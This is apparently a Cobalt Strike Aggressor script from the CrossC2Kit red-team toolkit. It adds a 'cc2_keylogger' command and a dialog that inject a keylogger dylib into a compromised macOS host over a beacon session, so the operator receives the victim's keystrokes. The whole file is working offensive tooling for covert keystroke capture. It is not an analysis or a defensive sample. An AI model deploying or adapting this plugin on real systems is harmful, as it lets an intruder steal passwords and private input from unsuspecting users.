
# include(script_resource("CrossC2Kit.cna"));

sub printUsage_keylogger {
    blog($1, "\nUsage: cc2_keylogger <linux(32)/osx> <process display name>\n\tlisten to the string entered by the user from the keyboard.\nEx:\n\tcc2_keylogger osx test");
}

sub cc2_keylogger {
    $taskName = "cc2_keylogger_osx"; # taskName
    $taskType = "dylib";  # $taskType -> ELF, MachO, so, dylib
    $taskResType = "keystrokes"; # keystrokes -> keylogger message

    $beaconid = $1;
    $displayName = $2;
    $transportArg = $displayName."^";

    $os = lc(beacon_info($bid, "os"));
    $arch = beacon_info($bid, "arch");

    if ('macos' isin $os) {
        $loadlib = "gather/keylogger/osx/cc2_keylogger.dylib";
    } else {
        berror($beaconid, "*[error]: Only supports osx.");
        printUsage_keylogger($beaconid);
        return;
    }
    if ($displayName) {
        blog($beaconid, "cc2_keylogger: ");
        bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg);
    } else {
        printUsage_keylogger($beaconid);
    }

}

ssh_alias("cc2_keylogger", &cc2_keylogger);

ssh_command_register("cc2_keylogger", "CrossC2 keylogger - listen to the string entered by the user from the keyboard.", "\nUsage: cc2_keylogger <process display name>\n\tlisten to the string entered by the user from the keyboard.\nEx:\n\tcc2_keylogger test");

sub openKeyloggerDialogCallBack {
    $bid = $3['bid'];
    $processName = $3['processName'];
    binput($bid, "cc2_keylogger $processName");
    cc2_keylogger($bid, $processName);
}

sub openKeyloggerDialog {
    local('$bid $dialog');
    $bid = $1;
    $dialog = dialog("CrossC2 keylogger (MacOS)", %(bid => $bid[0], processName => "test"), &openKeyloggerDialogCallBack);
    dialog_description($dialog, "listen to the string entered by the user from the keyboard");

    drow_text($dialog, "processName", "ProcessDisplay: ", 20); 

    dbutton_action($dialog, "run");
    dialog_show($dialog);
}



sub cc2_keylogger_status {
    local('$bid $os $arch $system');
    $bid = $1;
    $os = lc(beacon_info($bid, "os"));
    $arch = beacon_info($bid, "arch");
    if ('macos' isin $os) {
        return 'MacOS(intel)';
    }
    return '';
}